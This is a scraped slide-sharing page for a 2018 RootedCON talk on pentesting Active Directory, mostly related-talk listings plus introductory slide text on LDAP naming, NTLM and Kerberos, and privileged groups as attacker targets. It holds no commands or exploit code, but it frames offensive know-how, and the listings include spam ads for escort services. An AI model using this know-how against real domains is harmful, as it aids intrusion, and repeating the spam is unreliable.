DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseFelipe Prado
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory EnumerationDaniel López Jiménez
 
Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51martinvoelk
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalPriyanka Aash
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoastken_kitahara
 
Cisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group TaggingCisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group TaggingCisco Canada
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiYossi Sassi
 
DANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSECDANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSECShumon Huque
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Paula Januszkiewicz
 
New Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQLNew Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQLconfluent
 
TechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISETechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISERobb Boyd
 
Keystone - Openstack Identity Service
Keystone - Openstack Identity Service Keystone - Openstack Identity Service
Keystone - Openstack Identity Service Prasad Mukhedkar
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
 

Similaire à Carlos García - Pentesting Active Directory [rooted2018] (20)

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
 
Null talk
Null talkNull talk
Null talk
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumeration
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
 
Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable Final
 
AAA Implementation
AAA ImplementationAAA Implementation
AAA Implementation
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
 
Cisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group TaggingCisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group Tagging
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
 
DANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSECDANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSEC
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
 
New Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQLNew Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQL
 
IoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideasIoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideas
 
TechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISETechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISE
 
Keystone - Openstack Identity Service
Keystone - Openstack Identity Service Keystone - Openstack Identity Service
Keystone - Openstack Identity Service
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 

Plus de RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 

Plus de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Dernier

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 

Dernier (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 

Carlos García - Pentesting Active Directory [rooted2018]

  • 2. ciyinet WHOAMI Carlos García García - Computer Science Engineer - Penetration Testing and Red Teaming - OSCP Certified - Co-author book “Hacking Windows: Ataques a sistemas y redes Microsoft” 2Pentesting Active Directory
  • 3. ciyinet WHAT ARE WE GOING TO TALK ABOUT? - Introduction to Active Directory - Authentication Protocols - Active Directory Penetration Testing - Reconnaissance - Common Attacks & Techniques - Lateral and Vertical Movements - How-to Avoid Being Caught 3Pentesting Active Directory
  • 4. ciyinet BEAR IN MIND - AD-related techniques - I learn Active Directory from the offensive side - We lower risks and not the other way around - This is going to be intense 4Pentesting Active Directory
  • 5. ciyinet 5 ACTIVE DIRECTORY 101 Pentesting Active Directory
  • 6. ciyinet ACTIVE DIRECTORY 101 • AD is Microsoft’s answer to directory services • Directory service is a hierarchical structure to store objects for quick access and management of all resources 6Pentesting Active Directory
  • 7. ciyinet ACTIVE DIRECTORY 101 • Uses LDAP as its access protocol • Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries • AD supports several Naming Conventions • User Principal Names (UPN): • user@domain • LDAP names (Distinguished Names): • cn=common name • ou=organizational unit • dc=domain • for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON 7Pentesting Active Directory
  • 9. ciyinet ACTIVE DIRECTORY 101 Just a Database: NTDS.dit 9Pentesting Active Directory
  • 10. ciyinet ACTIVE DIRECTORY 101 Domain Controllers and Domain Admins 10Pentesting Active Directory
  • 11. ciyinet CREDENTIALS FLOW IN WINDOWS 11Pentesting Active Directory
  • 12. ciyinet 12 NTLM SCHEME Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
  • 13. ciyinet 13 KERBEROS SCHEME Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
  • 14. ciyinet 14 KERBEROS SCHEME Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
  • 15. PENTESTING ACTIVE DIRECTORY Sure, but how about actually pentesting it?
  • 16. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 16Pentesting Active Directory
  • 17. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 17Pentesting Active Directory • Domain admins • Enterprise admins • Built-in administrators • Account Operators • Allowed RODC Password Replication Group • Backup Operators • DnsAdmins • …
  • 18. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! 18Pentesting Active Directory
  • 19. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! WMIC 19Pentesting Active Directory
  • 20. ciyinet 20 ATTACK KILL CHAIN Reference: Microsoft Advanced Threat Analytics Pentesting Active Directory
  • 21. ciyinet 21 ATTACK KILL CHAIN Pentesting Active Directory
  • 22. ciyinet 22 ATTACK KILL CHAIN Pentesting Active Directory
